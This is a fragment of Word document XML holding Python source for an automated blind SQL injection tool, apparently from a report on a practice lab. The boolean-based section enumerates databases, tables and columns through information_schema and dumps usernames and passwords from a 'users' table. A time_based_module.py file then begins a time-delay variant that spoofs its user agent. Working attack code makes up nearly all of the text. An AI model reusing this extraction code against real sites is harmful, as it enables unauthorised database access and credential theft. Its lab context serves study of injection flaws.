      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where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 xml:space="preserve"> = 'security'" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB9C4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" limit 0,1),{0}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{1}--+".format(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, ascii(j))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0800F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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371A49D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 xml:space="preserve"> = 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exp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068FA0D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4F1A028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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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33DF547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normalContextLen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 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r.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B799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tbs += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3378F4F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bs = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tbs.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425AEAB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tbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA7A45" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2261671C" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DBD5FF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columns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3516279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normalContextLen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"?id=1").text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF9CEE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= "?id=1' and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6383683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umns = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43418F7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"&gt;Scanning columns...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452AD7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21):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179DE7F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1FD8D15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exp = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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lumn_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE3AB9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"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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 xml:space="preserve"> = 'security' and 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 xml:space="preserve"> = 'users'" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483A36B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" limit 0,1),{0}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{1}--+".format(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, ascii(j))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C51DE2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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC53A1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 xml:space="preserve"> = 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exp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085170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374B10A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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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55CA97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normalContextLen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 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r.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5819887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columns += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6695B7C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columns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8A9C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umns = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>columns.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5733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columns)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5EC1E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columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0140F0F8" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336902DB" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E9F5E3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values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22EDE3A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normalContextLen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"?id=1").text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B42FE9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= "?id=1' and "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742CE16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usrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D03FB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 xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829A09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"&gt;Scanning values...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200332A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0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BAEA1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5EB246E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d = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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username) from users" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856AC4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" limit 0,1),{0}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{1}--+".format(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, ascii(j))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301C585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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A75EA2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 xml:space="preserve"> = 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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A3DCB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315815F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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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1B4EFC9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normalContextLen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 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r.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C391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usrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61670F3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srs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BF34A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usrs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usrs.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4753C0A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0):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7313E77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5DA4B88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exp = "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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password) from users" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1347A7F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" limit 0,1),{0}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{1}--+".format(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, ascii(j))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F02E2C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id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC1D8E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 xml:space="preserve"> = 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exp)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB317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3995A5B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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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_get</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03C84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normalContextLen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> == 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r.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55283C3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 xml:space="preserve"> += j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039AE8B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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD988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pwds.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183259A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%-12s%-12s' % ('username', 'password'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA61BE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us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w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zip(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usrs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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25887A2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%-12s%-12s' % (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>us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wd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC2135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536CB1CB" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BED93CA" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344B54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bool_based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48E600E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dbs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get_dbs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3ABD4BC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range(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dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B10CB1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f"{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+ 1}." + str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[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]), end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B006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Default Use Database security......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5A3B5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bs = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_tables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26A44C7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range(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tbs)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0816E18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f"{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+ 1}." + str(tbs[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]), end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D6BF8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Default Use Table users......')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E5C7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s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>get_columns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7FADDA2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range(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cols)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B98034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f"{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+ 1}. " + str(cols[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]), end=' ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C2C2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get_values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47B1CD1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"Success"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B16D2F1" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F"/>
    <w:p w14:paraId="05A70F44" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F"/>
    <w:p w14:paraId="75016184" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:t>Gets/time_based_module.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5106FF8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import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>binascii</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="14860AE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requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D1B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fake_useragent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0FF4162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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220383C2" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE260EC" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36AD277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def log(content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCF98B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time.strftime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('%H:%H:%S', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time.local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ime.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562326F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[' + str(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>) + ']' + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B5E5A" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C7F5D23" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D24FBA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table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end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED62954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获取长度</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC4D4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length = 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422CE3B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L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000):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28142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payload =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 + \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9928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"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>length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 xml:space="preserve">) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2BF2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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f"where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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database()</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>))=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">{L}" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="015B94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Getting length of all databases: ' + str(L))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31573D7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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>judge_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD4F2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current length of all databases:' + str(L))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173353F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length = L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A030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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C2EF8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L == 999:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6BA23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spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f'Cannot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> get length of all databases: {L}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023A530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1290C901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获取值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577BF67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ables_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AA3E0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231B028A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    log(f'\r</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>正在</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取第</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>值：</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>}')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D3A1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ascii_num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39, 123):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEAECB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payload =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 + \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6887BFD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f"(select ascii(mid(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able_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>),{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd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},1)) from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> " \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD8282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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>f"where</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">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database(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>))=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii_num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">}" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>payload_end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="118A043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judge_time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(payload):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D1735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tables_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> += chr(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ascii_num</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C42F95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ables_list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tables_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>name.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106480E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f'\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nTables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attaining completed:')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB2193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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tables_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D7F8558" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
